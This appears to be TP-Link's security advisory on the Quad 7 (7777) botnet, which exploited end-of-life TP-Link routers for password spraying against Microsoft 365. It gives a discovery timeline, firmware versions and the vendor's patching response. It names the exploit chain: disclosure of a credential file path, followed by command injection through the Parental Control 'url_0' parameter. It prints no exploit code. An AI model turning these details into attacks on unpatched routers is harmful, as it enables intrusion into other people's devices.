Technical News and Reports about Quad 7 (7777) Botnet aka CovertNetwork-1658

Microsoft has tracked a network of compromised Small Office / Home Office (SOHO) routers, predominantly TP-Link devices, as CovertNetwork-1658 (also called the Quad 7 (7777) botnet). This network has been used by Chinese threat actors for password spray attacks against Microsoft 365 accounts. The threat actor exploits vulnerabilities in the routers to gain remote code execution capability.

Sekoia.io monitored a TP-Link WR841N router (3.16.9 Build 150320 Rel.57500n), which is known to be vulnerable to a chained exploit attack used by the Quad 7 botnet. Sekoia observed a notable attack that chained an unauthenticated file disclosure and a command injection. This unauthenticated file disclosure allowed the threat actor to retrieve the pair of credentials stored in /tmp/dropbear/dropbearpwd and replay them in the HTTP Basic authentication of the management interface (NVD - CVE-2023-50224). Once authenticated, the attacker exploited a known command injection vulnerability in the Parental Control page to achieve the RCE (https://openwrt.org/toh/tp-link/tl-mr22u_v1, no documented CVE).

This exploit chain is only available when the end user has enabled the remote administration interface to the internet, which is not configured by default by TP-Link firmware. TP-Link recommends against exposing the remote administration interface to the internet as a matter of course.

Discovery Timeline:

10/19/2023

• Independent researchers Gi7w0rm and Dunstable Toblerone published a blog post about a botnet nicknamed the “Quad7 botnet” or “7777 botnet”. The post notes that the botnet’s signature pattern can be observed between June and July 2022.
• https://gi7w0rm.medium.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd

07/23/2024

• Sekoia.io, a French network security software operator, investigated the same botnet and indicated that its operators were leveraging compromised TP-Link routers to perform password spraying attacks against Microsoft 365 accounts without any specific targeting.
• https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/

09/09/2024

• A cybersecurity news site reported that the Quad 7 botnet had expanded to target several additional brands of SOHO routers and VPN appliances, including Zyxel, Asus, Axentra, D-Link, and Netgear, using multiple vulnerabilities, some of which were previously unknown.
• https://thehackernews.com/2024/09/quad7-botnet-expands-to-target-soho.html

10/31/2024

Microsoft published a blog post reporting intrusion activity successfully targeting and stealing credentials from multiple Microsoft customers by a threat actor identified as associated with the Quad 7 botnet. Microsoft stated the network of compromised devices used by the threat actor was comprised mostly of TP-Link SOHO routers. Microsoft also noted the use of the compromised devices had declined steeply since the network’s activities were publicly reported on.

• https://www.microsoft.com/en-us/security/blog/2024/10/31/chinese-threat-actor-storm-0940-uses-credentials-from-password-spray-attacks-from-a-covert-network/

Related CVEs and Known Exploits

NVD - CVE-2023-50224 - According to Sekoia’s analysis, the threat actor chained two vulnerabilities.

• The first vulnerability is an unauthenticated file disclosure allowing for the retrieval of credentials stored in /tmp/dropbear/dropbearpwd. These credentials were then replayed in the HTTP Basic authentication of the management interface. TP-Link has been tracking this vulnerability internally as TP-Link Vulnerability Disclosure (TPVD) 202321023 TL-WR841N. Patched firmware for the affected devices can be found here.

• The second vulnerability is a known Parental Control command injection RCE exploit. In this vulnerability, tampering with the url_0 parameter in the Parental Control page is used to achieve the RCE. This vulnerability had not previously been reported to TP-Link and does not have a CVE. TP-Link is currently tracking this vulnerability internally as TPVD202411095 and we are processing a corresponding CVE submission. Patched firmware for the affected devices can be found here.

Related Firmware and Router Models

• There are two router models and associated firmware versions relevant to the discovery timeline:

• TL-WR841N/ND(MS) 9.0 Firmware version: 3.16.9 Build 150320 Rel.57500n
• Archer C7(EU) 2.0, Firmware version 3.15.3 Build 180305 Rel.51282n

• The firmware versions at issue are several revisions behind the latest firmware for these particular TP-Link SOHO Routers. The identified routers are also at End of Life (EOL) status, (see our EOL_List_Home.pdf and our TP-Link End-of-Life Policy). These been replaced by new families of products with superior capabilities and security models. . The replacement models are not affected by these vulnerabilities.
• TP-Link is tracking unconfirmed reports of other vulnerable router models, and we will provide updates upon further investigation.

How TP-Link is Responding

• TP-Link is performing the following:
• Despite the affected router models used in the Quad 7 botnet being past their EOL/EOS date, TP-Link has developed and released firmware patching the vulnerabilities used by the Storm-0940/Quad7 threat actor (linked above). We have engaged with the community to raise awareness on the availability of these updates.
• We are engaging with security researchers to obtain additional samples of affected binaries and deployed adversarial payloads in order to perform additional analysis and development of additional Indicators of Compromise (IoC).
• TP-Link and its security partners are actively monitoring public intelligence data on the Quad 7 botnet and similar emerging threats, and the company commits to taking speedy and appropriate action to protect its customers and their devices.